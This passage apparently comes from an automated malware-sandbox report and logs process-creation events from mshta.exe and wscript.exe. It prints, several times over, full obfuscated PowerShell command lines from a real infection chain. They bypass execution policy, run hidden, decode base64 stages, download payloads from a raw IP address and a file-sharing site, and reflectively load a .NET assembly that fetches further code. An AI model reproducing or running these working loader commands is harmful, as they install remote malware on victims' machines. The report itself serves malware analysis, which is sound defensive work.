'+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
